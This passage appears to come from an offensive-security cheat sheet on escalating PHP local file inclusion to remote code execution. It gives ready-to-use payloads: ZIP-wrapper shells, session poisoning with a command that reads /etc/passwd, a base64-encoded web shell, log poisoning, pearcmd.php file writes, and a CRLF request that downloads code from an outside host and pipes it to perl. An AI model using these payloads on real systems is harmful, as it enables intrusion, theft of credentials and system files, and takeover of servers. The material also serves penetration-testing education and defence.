http://example.com/index.php?page=path/to/uploaded/file.png
```

In order to keep the file legible it is best to inject into the metadata of the pictures/doc/pdf

Via ZIP file upload

Upload a ZIP file containing a PHP shell compressed and access it:

```url
example.com/page.php?file=zip://path/to/zip/hello.zip%23rce.php
```

Via PHP sessions

Check if the website uses PHP Session (PHPSESSID)

```http
Set-Cookie: PHPSESSID=i56kgbsq9rm8ndg3qbarhsbm27; path=/
Set-Cookie: user=admin; expires=Mon, 13-Aug-2018 20:21:29 GMT; path=/; httponly
```

In PHP these sessions are stored into /var/lib/php5/sess_[PHPSESSID] files

```text
/var/lib/php5/sess_i56kgbsq9rm8ndg3qbarhsbm27.
user_ip|s:0:"";loggedin|s:0:"";lang|s:9:"en_us.php";win_lin|s:0:"";user|s:6:"admin";pass|s:6:"admin";
```

Set the cookie to <?php system('cat /etc/passwd');?>

```text
login=1&user=<?php system("cat /etc/passwd");?>&pass=password&lang=en_us.php
```

Use the LFI to include the PHP session file

```text
login=1&user=admin&pass=password&lang=/../../../../../../../../../var/lib/php5/sess_i56kgbsq9rm8ndg3qbarhsbm2
```

Via ssh

If ssh is active check which user is being used (/proc/self/status & /etc/passwd) and try to access <HOME>/.ssh/id_rsa

Via vsftpd logs

The logs of the FTP server vsftpd are located at /var/log/vsftpd.log. In the scenario where a Local File Inclusion (LFI) vulnerability exists, and access to an exposed vsftpd server is possible, the following steps can be considered:

  1. Inject a PHP payload into the username field during the login process.
  2. Post injection, utilize the LFI to retrieve the server logs from /var/log/vsftpd.log.

Via php base64 filter (using base64)

As shown in this article, the PHP base64 filter just ignores non-base64 characters. You can use that to bypass the file extension check: if you supply base64 that ends with ".php", it would just ignore the "." and append "php" to the base64. Here is an example payload:

```url
http://example.com/index.php?page=PHP://filter/convert.base64-decode/resource=data://plain/text,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7ZWNobyAnU2hlbGwgZG9uZSAhJzsgPz4+.php
```

NOTE: the payload is "<?php system($_GET['cmd']);echo 'Shell done !'; ?>"

Via php filters (no file needed)

This writeup explains that you can use php filters to generate arbitrary content as output. Which basically means that you can generate arbitrary php code for the include without needing to write it into a file.

LFI2RCE via PHP Filters

Via segmentation fault

Upload a file that will be stored as temporary in /tmp, then in the same request trigger a segmentation fault; the temporary file won't be deleted and you can search for it.

LFI2RCE via Segmentation Fault

Via Nginx temp file storage

If you found a Local File Inclusion and Nginx is running in front of PHP you might be able to obtain RCE with the following technique:

LFI2RCE via Nginx temp files

Via PHP_SESSION_UPLOAD_PROGRESS

This works even if you don't have a session and session.auto_start is Off: if you provide PHP_SESSION_UPLOAD_PROGRESS in multipart POST data, PHP will enable the session for you. You could abuse this to get RCE:

LFI2RCE via PHP_SESSION_UPLOAD_PROGRESS

Via temp file uploads in Windows

If you found a Local File Inclusion and the server is running in Windows you might get RCE:

LFI2RCE Via temp file uploads

Via pearcmd.php + URL args

As explained in this post, the script /usr/local/lib/php/pearcmd.php exists by default in php docker images. Moreover, it's possible to pass arguments to the script via the URL because it's indicated that if a URL param doesn't have an =, it should be used as an argument. See also watchTowr's write-up and Orange Tsai's "Confusion Attacks".

The following request creates a file in /tmp/hello.php with the content <?=phpinfo()?>:

```http
GET /index.php?+config-create+/&file=/usr/local/lib/php/pearcmd.php&/<?=phpinfo()?>+/tmp/hello.php HTTP/1.1
```

The following abuses a CRLF vuln to get RCE (from here):

```http
http://server/cgi-bin/redir.cgi?r=http:// %0d%0a
Location:/ooo? %2b run-tests %2b -ui %2b $(curl${IFS}orange.tw/x|perl) %2b alltests.php %0d%0a
Content-Type:proxy:unix:/run/php/php-fpm.sock|fcgi://127.0.0.1/usr/local/lib/php/pearcmd.php %0d%0a
%0d%0a
```

Via phpinfo() (file_uploads = on)

If you found a Local File Inclusion and a file exposing phpinfo() with file_uploads = on you can get RCE:

LFI2RCE via phpinfo()

Via compress.zlib + PHP_STREAM_PREFER_STDIO + Path Disclosure

If you found a Local File Inclusion and you can exfiltrate the path of the temp file BUT the server is checking if the file to be included has PHP marks, you can try to bypass that check with this Race Condition:

LFI2RCE Via compress.zlib + PHP_STREAM_PREFER_STDIO + Path Disclosure

Via eternal waiting + bruteforce

If you can abuse the LFI to upload temporary files and make the server hang the PHP execution, you could then brute force filenames during hours to find the temporary file:

LFI2RCE via Eternal waiting

Via Fatal Error

If you include any of the files /usr/bin/phar, /usr/bin/phar7, /usr/bin/phar.phar7, /usr/bin/phar.phar. (You need to include the same one 2 times to throw that error).

I don't know how this could be useful but it might be.
Even if you cause a PHP Fatal Error, PHP temporary files uploaded are deleted.
